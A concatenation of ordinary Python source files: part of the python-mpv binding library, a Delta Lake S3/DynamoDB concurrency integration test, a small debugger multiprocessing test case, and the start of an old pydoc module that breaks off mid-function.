def show_text(self, string, duration='-1', level=None):
"""Mapped mpv show_text command, see man mpv(1)."""
self.command('show_text', string, duration, level)
def expand_text(self, text):
"""Mapped mpv expand-text command, see man mpv(1)."""
return self.node_command('expand-text', text)
def expand_path(self, path):
"""Mapped mpv expand-path command, see man mpv(1)."""
return self.node_command('expand-path', path)
def show_progress(self):
"""Mapped mpv show_progress command, see man mpv(1)."""
self.command('show_progress')
def rescan_external_files(self, mode='reselect'):
"""Mapped mpv rescan-external-files command, see man mpv(1)."""
self.command('rescan-external-files', mode)
def discnav(self, command):
"""Mapped mpv discnav command, see man mpv(1)."""
self.command('discnav', command)
def mouse(self, x, y, button=None, mode='single'):
"""Mapped mpv mouse command, see man mpv(1)."""
if button is None:
self.command('mouse', x, y, mode)
else:
self.command('mouse', x, y, button, mode)
def keypress(self, name):
"""Mapped mpv keypress command, see man mpv(1)."""
self.command('keypress', name)
def keydown(self, name):
"""Mapped mpv keydown command, see man mpv(1)."""
self.command('keydown', name)
def keyup(self, name=None):
"""Mapped mpv keyup command, see man mpv(1)."""
if name is None:
self.command('keyup')
else:
self.command('keyup', name)
def keybind(self, name, command):
"""Mapped mpv keybind command, see man mpv(1)."""
self.command('keybind', name, command)
def write_watch_later_config(self):
"""Mapped mpv write_watch_later_config command, see man mpv(1)."""
self.command('write_watch_later_config')
def overlay_add(self, overlay_id, x, y, file_or_fd, offset, fmt, w, h, stride):
"""Mapped mpv overlay_add command, see man mpv(1)."""
self.command('overlay_add', overlay_id, x, y, file_or_fd, offset, fmt, w, h, stride)
def overlay_remove(self, overlay_id):
"""Mapped mpv overlay_remove command, see man mpv(1)."""
self.command('overlay_remove', overlay_id)
def script_message(self, *args):
"""Mapped mpv script_message command, see man mpv(1)."""
self.command('script_message', *args)
def script_message_to(self, target, *args):
"""Mapped mpv script_message_to command, see man mpv(1)."""
self.command('script_message_to', target, *args)
def observe_property(self, name, handler):
"""Register an observer on the named property. An observer is a function that is called with the new property
value every time the property's value is changed. The basic function signature is ``fun(property_name,
new_value)`` with new_value being the decoded property value as a python object. This function can be used as a
function decorator if no handler is given.
To unregister the observer, call either of ``mpv.unobserve_property(name, handler)``,
``mpv.unobserve_all_properties(handler)`` or the handler's ``unobserve_mpv_properties`` attribute::
@player.property_observer('volume')
def my_handler(property_name, new_volume):
print("It's loud!", new_volume)
my_handler.unobserve_mpv_properties()
"""
self._property_handlers[name].append(handler)
_mpv_observe_property(self._event_handle, hash(name)&0xffffffffffffffff, name.encode('utf-8'), MpvFormat.NODE)
def property_observer(self, name):
"""Function decorator to register a property observer. See ``MPV.observe_property`` for details."""
def wrapper(fun):
self.observe_property(name, fun)
fun.unobserve_mpv_properties = lambda: self.unobserve_property(name, fun)
return fun
return wrapper
def unobserve_property(self, name, handler):
"""Unregister a property observer. This requires both the observed property's name and the handler function that
was originally registered as one handler could be registered for several properties. To unregister a handler
from *all* observed properties see ``unobserve_all_properties``.
"""
self._property_handlers[name].remove(handler)
if not self._property_handlers[name]:
_mpv_unobserve_property(self._event_handle, hash(name)&0xffffffffffffffff)
def unobserve_all_properties(self, handler):
"""Unregister a property observer from *all* observed properties."""
for name in self._property_handlers:
self.unobserve_property(name, handler)
def register_message_handler(self, target, handler=None):
"""Register a mpv script message handler. This can be used to communicate with embedded lua scripts. Pass the
script message target name this handler should be listening to and the handler function.
WARNING: Only one handler can be registered at a time for any given target.
To unregister the message handler, call its ``unregister_mpv_messages`` function::
player = mpv.MPV()
@player.message_handler('foo')
def my_handler(some, args):
print(args)
my_handler.unregister_mpv_messages()
"""
self._register_message_handler_internal(target, handler)
def _register_message_handler_internal(self, target, handler):
self._message_handlers[target] = handler
def unregister_message_handler(self, target_or_handler):
"""Unregister a mpv script message handler for the given script message target name.
You can also call the ``unregister_mpv_messages`` function attribute set on the handler function when it is
registered.
"""
if isinstance(target_or_handler, str):
del self._message_handlers[target_or_handler]
else:
for key, val in self._message_handlers.items():
if val == target_or_handler:
del self._message_handlers[key]
def message_handler(self, target):
"""Decorator to register a mpv script message handler.
WARNING: Only one handler can be registered at a time for any given target.
To unregister the message handler, call its ``unregister_mpv_messages`` function::
player = mpv.MPV()
@player.message_handler('foo')
def my_handler(some, args):
print(args)
my_handler.unregister_mpv_messages()
"""
def register(handler):
self._register_message_handler_internal(target, handler)
handler.unregister_mpv_messages = lambda: self.unregister_message_handler(handler)
return handler
return register
def register_event_callback(self, callback):
"""Register a blanket event callback receiving all event types.
To unregister the event callback, call its ``unregister_mpv_events`` function::
player = mpv.MPV()
@player.event_callback('shutdown')
def my_handler(event):
print('It ded.')
my_handler.unregister_mpv_events()
"""
self._event_callbacks.append(callback)
def unregister_event_callback(self, callback):
"""Unregiser an event callback."""
self._event_callbacks.remove(callback)
def event_callback(self, *event_types):
"""Function decorator to register a blanket event callback for the given event types. Event types can be given
as str (e.g. 'start-file'), integer or MpvEventID object.
WARNING: Due to the way this is filtering events, this decorator cannot be chained with itself.
To unregister the event callback, call its ``unregister_mpv_events`` function::
player = mpv.MPV()
@player.event_callback('shutdown')
def my_handler(event):
print('It ded.')
my_handler.unregister_mpv_events()
"""
def register(callback):
with self._event_handler_lock:
self.check_core_alive()
types = [MpvEventID.from_str(t) if isinstance(t, str) else t for t in event_types] or MpvEventID.ANY
@wraps(callback)
def wrapper(event, *args, **kwargs):
if event['event_id'] in types:
callback(event, *args, **kwargs)
self._event_callbacks.append(wrapper)
wrapper.unregister_mpv_events = partial(self.unregister_event_callback, wrapper)
return wrapper
return register
@staticmethod
def _binding_name(callback_or_cmd):
return 'py_kb_{:016x}'.format(hash(callback_or_cmd)&0xffffffffffffffff)
def on_key_press(self, keydef, mode='force'):
"""Function decorator to register a simplified key binding. The callback is called whenever the key given is
*pressed*.
To unregister the callback function, you can call its ``unregister_mpv_key_bindings`` attribute::
player = mpv.MPV()
@player.on_key_press('Q')
def binding():
print('blep')
binding.unregister_mpv_key_bindings()
WARNING: For a single keydef only a single callback/command can be registered at the same time. If you register
a binding multiple times older bindings will be overwritten and there is a possibility of references leaking. So
don't do that.
The BIG FAT WARNING regarding untrusted keydefs from the key_binding method applies here as well.
"""
def register(fun):
@self.key_binding(keydef, mode)
@wraps(fun)
def wrapper(state='p-', name=None, char=None):
if state[0] in ('d', 'p'):
fun()
return wrapper
return register
def key_binding(self, keydef, mode='force'):
"""Function decorator to register a low-level key binding.
The callback function signature is ``fun(key_state, key_name)`` where ``key_state`` is either ``'U'`` for "key
up" or ``'D'`` for "key down".
The keydef format is: ``[Shift+][Ctrl+][Alt+][Meta+]<key>`` where ``<key>`` is either the literal character the
key produces (ASCII or Unicode character), or a symbolic name (as printed by ``mpv --input-keylist``).
To unregister the callback function, you can call its ``unregister_mpv_key_bindings`` attribute::
player = mpv.MPV()
@player.key_binding('Q')
def binding(state, name, char):
print('blep')
binding.unregister_mpv_key_bindings()
WARNING: For a single keydef only a single callback/command can be registered at the same time. If you register
a binding multiple times older bindings will be overwritten and there is a possibility of references leaking. So
don't do that.
BIG FAT WARNING: mpv's key binding mechanism is pretty powerful. This means, you essentially get arbitrary code
execution through key bindings. This interface makes some limited effort to sanitize the keydef given in the
first parameter, but YOU SHOULD NOT RELY ON THIS FOR SECURITY. If your input comes from config files, this is
completely fine--but if you are about to pass untrusted input into this parameter, better double-check whether
this is secure in your case.
"""
def register(fun):
fun.mpv_key_bindings = getattr(fun, 'mpv_key_bindings', []) + [keydef]
def unregister_all():
for keydef in fun.mpv_key_bindings:
self.unregister_key_binding(keydef)
fun.unregister_mpv_key_bindings = unregister_all
self.register_key_binding(keydef, fun, mode)
return fun
return register
def register_key_binding(self, keydef, callback_or_cmd, mode='force'):
"""Register a key binding. This takes an mpv keydef and either a string containing a mpv command or a python
callback function. See ``MPV.key_binding`` for details.
"""
if not re.match(r'(Shift\+)?(Ctrl\+)?(Alt\+)?(Meta\+)?(.|\w+)', keydef):
raise ValueError('Invalid keydef. Expected format: [Shift+][Ctrl+][Alt+][Meta+]<key>\n'
'<key> is either the literal character the key produces (ASCII or Unicode character), or a '
'symbolic name (as printed by --input-keylist).')
binding_name = MPV._binding_name(keydef)
if callable(callback_or_cmd):
self._key_binding_handlers[binding_name] = callback_or_cmd
self.register_message_handler('key-binding', self._handle_key_binding_message)
self.command('define-section',
binding_name, '{} script-binding py_event_handler/{}'.format(keydef, binding_name), mode)
elif isinstance(callback_or_cmd, str):
self.command('define-section', binding_name, '{} {}'.format(keydef, callback_or_cmd), mode)
else:
raise TypeError('register_key_binding expects either an str with an mpv command or a python callable.')
self.command('enable-section', binding_name, 'allow-hide-cursor+allow-vo-dragging')
def _handle_key_binding_message(self, binding_name, key_state, key_name=None, key_char=None):
self._key_binding_handlers[binding_name](key_state, key_name, key_char)
def unregister_key_binding(self, keydef):
"""Unregister a key binding by keydef."""
binding_name = MPV._binding_name(keydef)
self.command('disable-section', binding_name)
self.command('define-section', binding_name, '')
if binding_name in self._key_binding_handlers:
del self._key_binding_handlers[binding_name]
if not self._key_binding_handlers:
self.unregister_message_handler('key-binding')
def register_stream_protocol(self, proto, open_fn=None):
""" Register a custom stream protocol as documented in libmpv/stream_cb.h:
https://github.com/mpv-player/mpv/blob/master/libmpv/stream_cb.h
proto is the protocol scheme, e.g. "foo" for "foo://" urls.
This function can either be used with two parameters or it can be used as a decorator on the target
function.
open_fn is a function taking an URI string and returning an mpv stream object.
open_fn may raise a ValueError to signal libmpv the URI could not be opened.
The mpv stream protocol is as follows:
class Stream:
@property
def size(self):
return None # unknown size
return size # int with size in bytes
def read(self, size):
...
return read # non-empty bytes object with input
return b'' # empty byte object signals permanent EOF
def seek(self, pos):
return new_offset # integer with new byte offset. The new offset may be before the requested offset
in case an exact seek is inconvenient.
def close(self):
...
# def cancel(self): (future API versions only)
# Abort a running read() or seek() operation
# ...
"""
def decorator(open_fn):
@StreamOpenFn
def open_backend(_userdata, uri, cb_info):
try:
frontend = open_fn(uri.decode('utf-8'))
except ValueError:
return ErrorCode.LOADING_FAILED
def read_backend(_userdata, buf, bufsize):
data = frontend.read(bufsize)
for i in range(len(data)):
buf[i] = data[i]
return len(data)
cb_info.contents.cookie = None
read = cb_info.contents.read = StreamReadFn(read_backend)
close = cb_info.contents.close = StreamCloseFn(lambda _userdata: frontend.close())
seek, size, cancel = None, None, None
if hasattr(frontend, 'seek'):
seek = cb_info.contents.seek = StreamSeekFn(lambda _userdata, offx: frontend.seek(offx))
if hasattr(frontend, 'size') and frontend.size is not None:
size = cb_info.contents.size = StreamSizeFn(lambda _userdata: frontend.size)
# Future API versions only
# if hasattr(frontend, 'cancel'):
# cb_info.contents.cancel = StreamCancelFn(lambda _userdata: frontend.cancel())
# keep frontend and callbacks in memory forever (TODO)
frontend._registered_callbacks = [read, close, seek, size, cancel]
self._stream_protocol_frontends[proto][uri] = frontend
return 0
if proto in self._stream_protocol_cbs:
raise KeyError('Stream protocol already registered')
self._stream_protocol_cbs[proto] = [open_backend]
_mpv_stream_cb_add_ro(self.handle, proto.encode('utf-8'), c_void_p(), open_backend)
return open_fn
if open_fn is not None:
decorator(open_fn)
return decorator
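# Example of a custom protocol following the Stream interface documented above (a sketch;
# the protocol name 'bytesbuf' and the served data are made up for illustration):
#     import io
#     @player.register_stream_protocol('bytesbuf')
#     def open_bytesbuf(uri):
#         data = b'\x00' * 1024            # whatever bytes this uri should serve
#         buf = io.BytesIO(data)
#         class Stream:
#             size = len(data)
#             def read(self, size):
#                 return buf.read(size)
#             def seek(self, pos):
#                 return buf.seek(pos)
#             def close(self):
#                 buf.close()
#         return Stream()
#     player.play('bytesbuf://anything')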
# Convenience functions
def play(self, filename):
"""Play a path or URL (requires ``ytdl`` option to be set)."""
self.loadfile(filename)
@property
def playlist_filenames(self):
"""Return all playlist item file names/URLs as a list of strs."""
return [element['filename'] for element in self.playlist]
def playlist_append(self, filename, **options):
"""Append a path or URL to the playlist. This does not start playing the file automatically. To do that, use
``MPV.loadfile(filename, 'append-play')``."""
self.loadfile(filename, 'append', **options)
# "Python stream" logic. This is some porcelain for directly playing data from python generators.
def _python_stream_open(self, uri):
"""Internal handler for python:// protocol streams registered through @python_stream(...) and
@python_stream_catchall
"""
name, = re.fullmatch('python://(.*)', uri).groups()
if name in self._python_streams:
generator_fun, size = self._python_streams[name]
else:
if self._python_stream_catchall is not None:
generator_fun, size = self._python_stream_catchall(name)
else:
raise ValueError('Python stream name not found and no catch-all defined')
return GeneratorStream(generator_fun, size)
def python_stream(self, name=None, size=None):
"""Register a generator for the python stream with the given name.
name is the name, i.e. the part after the "python://" in the URI, that this generator is registered as.
size is the total number of bytes in the stream (if known).
Any given name can only be registered once. The catch-all can also only be registered once. To unregister a
stream, call the .unregister function set on the callback.
The generator signals EOF by returning or by yielding b'', an empty bytes object (manually raising StopIteration
inside a generator no longer terminates it cleanly on current Python versions; see PEP 479).
The generator may be called multiple times if libmpv seeks or loops.
See also: @mpv.python_stream_catchall
@mpv.python_stream('foobar')
def reader():
for chunk in chunks:
yield chunk
mpv.play('python://foobar')
mpv.wait_for_playback()
reader.unregister()
"""
def register(cb):
if name in self._python_streams:
raise KeyError('Python stream name "{}" is already registered'.format(name))
self._python_streams[name] = (cb, size)
def unregister():
if name not in self._python_streams or\
self._python_streams[name][0] is not cb: # This is just a basic sanity check
raise RuntimeError('Python stream has already been unregistered')
del self._python_streams[name]
cb.unregister = unregister
return cb
return register
def python_stream_catchall(self, cb):
""" Register a catch-all python stream to be called when no name matches can be found. Use this decorator on a
function that takes a name argument and returns a (generator, size) tuple (with size being None if unknown).
An invalid URI can be signalled to libmpv by raising a ValueError inside the callback.
See also: @mpv.python_stream(name, size)
@mpv.python_stream_catchall
def catchall(name):
if not name.startswith('foo'):
raise ValueError('Unknown Name')
def foo_reader():
with open(name, 'rb') as f:
while True:
chunk = f.read(1024)
if not chunk:
break
yield chunk
return foo_reader, None
mpv.play('python://foo23')
mpv.wait_for_playback()
catchall.unregister()
"""
if self._python_stream_catchall is not None:
raise KeyError('A catch-all python stream is already registered')
self._python_stream_catchall = cb
def unregister():
if self._python_stream_catchall is not cb:
raise RuntimeError('This catch-all python stream has already been unregistered')
self._python_stream_catchall = None
cb.unregister = unregister
return cb
# Property accessors
def _get_property(self, name, decoder=strict_decoder, fmt=MpvFormat.NODE):
self.check_core_alive()
out = create_string_buffer(sizeof(MpvNode))
try:
cval = _mpv_get_property(self.handle, name.encode('utf-8'), fmt, out)
if fmt is MpvFormat.OSD_STRING:
return cast(out, POINTER(c_char_p)).contents.value.decode('utf-8')
elif fmt is MpvFormat.NODE:
rv = cast(out, POINTER(MpvNode)).contents.node_value(decoder=decoder)
_mpv_free_node_contents(out)
return rv
else:
raise TypeError('_get_property only supports NODE and OSD_STRING formats.')
except PropertyUnavailableError as ex:
return None
def _set_property(self, name, value):
self.check_core_alive()
ename = name.encode('utf-8')
if isinstance(value, (list, set, dict)):
_1, _2, _3, pointer = _make_node_str_list(value)
_mpv_set_property(self.handle, ename, MpvFormat.NODE, pointer)
else:
_mpv_set_property_string(self.handle, ename, _mpv_coax_proptype(value))
def __getattr__(self, name):
return self._get_property(_py_to_mpv(name), lazy_decoder)
def __setattr__(self, name, value):
try:
if name != 'handle' and not name.startswith('_'):
self._set_property(_py_to_mpv(name), value)
else:
super().__setattr__(name, value)
except AttributeError:
super().__setattr__(name, value)
def __dir__(self):
return super().__dir__() + [ name.replace('-', '_') for name in self.property_list ]
@property
def properties(self):
return { name: self.option_info(name) for name in self.property_list }
# Dict-like option access
def __getitem__(self, name, file_local=False):
"""Get an option value."""
prefix = 'file-local-options/' if file_local else 'options/'
return self._get_property(prefix+name, lazy_decoder)
def __setitem__(self, name, value, file_local=False):
"""Set an option value."""
prefix = 'file-local-options/' if file_local else 'options/'
return self._set_property(prefix+name, value)
def __iter__(self):
"""Iterate over all option names."""
return iter(self.options)
def option_info(self, name):
"""Get information on the given option."""
try:
return self._get_property('option-info/'+name)
except AttributeError:
return None
class MpvRenderContext:
def __init__(self, mpv, api_type, **kwargs):
self._mpv = mpv
kwargs['api_type'] = api_type
buf = cast(create_string_buffer(sizeof(MpvRenderCtxHandle)), POINTER(MpvRenderCtxHandle))
_mpv_render_context_create(buf, mpv.handle, kwargs_to_render_param_array(kwargs))
self._handle = buf.contents
def free(self):
_mpv_render_context_free(self._handle)
def __setattr__(self, name, value):
if name.startswith('_'):
super().__setattr__(name, value)
elif name == 'update_cb':
func = value if value else (lambda: None)
self._update_cb = value
self._update_fn_wrapper = RenderUpdateFn(lambda _userdata: func())
_mpv_render_context_set_update_callback(self._handle, self._update_fn_wrapper, None)
else:
param = MpvRenderParam(name, value)
_mpv_render_context_set_parameter(self._handle, param)
def __getattr__(self, name):
if name == 'update_cb':
return self._update_cb
elif name == 'handle':
return self._handle
param = MpvRenderParam(name)
data_type = type(param.data.contents)
buf = cast(create_string_buffer(sizeof(data_type)), POINTER(data_type))
param.data = buf
_mpv_render_context_get_info(self._handle, param)
return buf.contents.as_dict()
def update(self):
""" Calls mpv_render_context_update and returns the MPV_RENDER_UPDATE_FRAME flag (see render.h) """
return bool(_mpv_render_context_update(self._handle) & 1)
def render(self, **kwargs):
_mpv_render_context_render(self._handle, kwargs_to_render_param_array(kwargs))
def report_swap(self):
_mpv_render_context_report_swap(self._handle)
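# A minimal end-to-end usage sketch for this module. It only runs when the file is
# executed directly and assumes that libmpv is installed and that a file named
# 'test.webm' exists in the working directory -- both are assumptions of the example,
# not requirements of the library.
if __name__ == '__main__':
    player = MPV(input_default_bindings=True, input_vo_keyboard=True, osc=True)

    @player.property_observer('time-pos')
    def time_observer(_name, value):
        # Receives the decoded property value; None while nothing is playing.
        if value is not None:
            print('Now playing at {:.2f}s'.format(value))

    @player.on_key_press('q')
    def quit_binding():
        player.quit()

    player.play('test.webm')
    try:
        player.wait_for_playback()
    except ShutdownError:
        pass
    player.terminate()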
|
dynamodb_logstore.py
|
#
# Copyright (2021) The Delta Lake Project Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import threading
from pyspark.sql import SparkSession
from multiprocessing.pool import ThreadPool
import time
"""
Create required dynamodb table with:
$ aws --region us-west-2 dynamodb create-table \
--table-name delta_log_test \
--attribute-definitions AttributeName=tablePath,AttributeType=S \
AttributeName=fileName,AttributeType=S \
--key-schema AttributeName=tablePath,KeyType=HASH \
AttributeName=fileName,KeyType=RANGE \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5
Run this script in root dir of repository:
export VERSION=$(cat version.sbt|cut -d '"' -f 2)
export DELTA_CONCURRENT_WRITERS=2
export DELTA_CONCURRENT_READERS=2
export DELTA_TABLE_PATH=s3a://test-bucket/delta-test/
export DELTA_DYNAMO_TABLE=delta_log_test
export DELTA_DYNAMO_REGION=us-west-2
export DELTA_STORAGE=io.delta.storage.S3DynamoDBLogStore
export DELTA_NUM_ROWS=16
./run-integration-tests.py --run-storage-s3-dynamodb-integration-tests \
--dbb-packages org.apache.hadoop:hadoop-aws:3.3.1,com.amazonaws:aws-java-sdk-bundle:1.12.142 \
--dbb-conf spark.jars.ivySettings=/workspace/ivy.settings \
spark.driver.extraJavaOptions=-Dlog4j.configuration=file:debug/log4j.properties
"""
# conf
delta_table_path = os.environ.get("DELTA_TABLE_PATH")
concurrent_writers = int(os.environ.get("DELTA_CONCURRENT_WRITERS", 2))
concurrent_readers = int(os.environ.get("DELTA_CONCURRENT_READERS", 2))
num_rows = int(os.environ.get("DELTA_NUM_ROWS", 16))
# className to instantiate. io.delta.storage.S3DynamoDBLogStore or .FailingS3DynamoDBLogStore
delta_storage = os.environ.get("DELTA_STORAGE", "io.delta.storage.S3DynamoDBLogStore")
dynamo_table_name = os.environ.get("DELTA_DYNAMO_TABLE", "delta_log_test")
dynamo_region = os.environ.get("DELTA_DYNAMO_REGION", "us-west-2")
dynamo_error_rates = os.environ.get("DELTA_DYNAMO_ERROR_RATES", "")
if delta_table_path is None:
print(f"\nSkipping Python test {os.path.basename(__file__)} due to the missing env variable "
f"`DELTA_TABLE_PATH`\n=====================")
sys.exit(0)
test_log = f"""
--- LOG ---\n
delta table path: {delta_table_path}
concurrent writers: {concurrent_writers}
concurrent readers: {concurrent_readers}
number of rows: {num_rows}
delta storage: {delta_storage}
dynamo table name: {dynamo_table_name}
{"dynamo_error_rates: {}".format(dynamo_error_rates) if dynamo_error_rates else ""}
=====================
"""
print(test_log)
spark = SparkSession \
.builder \
.appName("utilities") \
.master("local[*]") \
.config("spark.sql.extensions", "io.delta.sql.DeltaSparkSessionExtension") \
.config("spark.delta.logStore.class", delta_storage) \
.config("io.delta.storage.ddb.tableName", dynamo_table_name) \
.config("io.delta.storage.ddb.region", dynamo_region) \
.config("io.delta.storage.errorRates", dynamo_error_rates) \
.getOrCreate()
# spark.sparkContext.setLogLevel("INFO")
data = spark.createDataFrame([], "id: int, a: int")
data.write.format("delta").mode("overwrite").partitionBy("id").save(delta_table_path)
def write_tx(n):
data = spark.createDataFrame([[n, n]], "id: int, a: int")
data.write.format("delta").mode("append").partitionBy("id").save(delta_table_path)
stop_reading = threading.Event()
def read_data():
while not stop_reading.is_set():
print("Reading {:d} rows ...".format(
spark.read.format("delta").load(delta_table_path).distinct().count())
)
time.sleep(1)
def start_read_thread():
thread = threading.Thread(target=read_data)
thread.start()
return thread
read_threads = [start_read_thread() for i in range(concurrent_readers)]
pool = ThreadPool(concurrent_writers)
start_t = time.time()
pool.map(write_tx, range(num_rows))
stop_reading.set()
for thread in read_threads:
thread.join()
actual = spark.read.format("delta").load(delta_table_path).distinct().count()
print("Number of written rows:", actual)
assert actual == num_rows
t = time.time() - start_t
print(f"{num_rows / t:.02f} tx / sec")
import boto3
from botocore.config import Config
my_config = Config(
region_name=dynamo_region,
)
dynamodb = boto3.resource('dynamodb', config=my_config)
table = dynamodb.Table(dynamo_table_name) # this ensures we actually used/created the input table
response = table.scan()
items = response['Items']
print(items[-1]) # print for manual validation
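# Optional follow-up check (a sketch): list the entries recorded for this table path.
# Note that S3DynamoDBLogStore may store a normalized form of DELTA_TABLE_PATH as the
# partition key, so adjust the value below if the query comes back empty.
from boto3.dynamodb.conditions import Key
per_table = table.query(KeyConditionExpression=Key('tablePath').eq(delta_table_path.rstrip('/')))
print("DynamoDB entries found for this table path:", per_table['Count'])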
|
_debugger_case_multiprocessing.py
|
import multiprocessing
import sys
def run(name):
print("argument: ", name) # break 1 here
if __name__ == '__main__':
if sys.version_info[0] >= 3 and sys.platform != 'win32':
multiprocessing.set_start_method('fork')
p = multiprocessing.Process(target=run, args=("argument to run method",))
p.start()
print('TEST SUCEEDED!') # break 2 here
p.join()
|
pydoc.py
|
#!/usr/bin/env python
# -*- coding: Latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://www.python.org/doc/current/lib/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision: 1.100.2.4 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from collections import deque
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
return result and re.sub('^ *\n', '', rstrip(result)) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = split(strip(doc), '\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not rstrip(lines[1]):
return lines[0], join(lines[2:], '\n')
return '', join(lines, '\n')
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = join(split(text, pairs[0]), pairs[1])
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
if _re_stripid.search(repr(Exception)):
return _re_stripid.sub(r'\1', text)
return text
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
if name in ['__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__']: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ['.py', '.pyc', '.pyo']:
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (0, None))
if lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
file = open(filename)
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = split(module.__doc__ or '', '\n')[0]
del sys.modules['__temp__']
else: # text modules can be directly examined
line = file.readline()
while line[:1] == '#' or not strip(line):
line = file.readline()
if not line: break
line = strip(line)
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not strip(line):
line = file.readline()
if not line: break
result = strip(split(line, '"""')[0])
else: result = None
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, (exc, value, tb)):
self.filename = filename
self.exc = exc
self.value = value
self.tb = tb
def __str__(self):
exc = self.exc
if type(exc) is types.ClassType:
exc = exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
if forceload and path in sys.modules:
# This is the only way to be sure. Checking the mtime of the file
# isn't good enough (e.g. what if the module contains a class that
# inherits from another module that has changed?).
if path not in sys.builtin_module_names:
# Python never loads a dynamic extension a second time from the
# same path, even if the file is changed or missing. Deleting
# the entry in sys.modules doesn't help for dynamic extensions,
# so we're not even going to try to keep them up to date.
info = inspect.getmoduleinfo(sys.modules[path].__file__)
if info[3] != imp.C_EXTENSION:
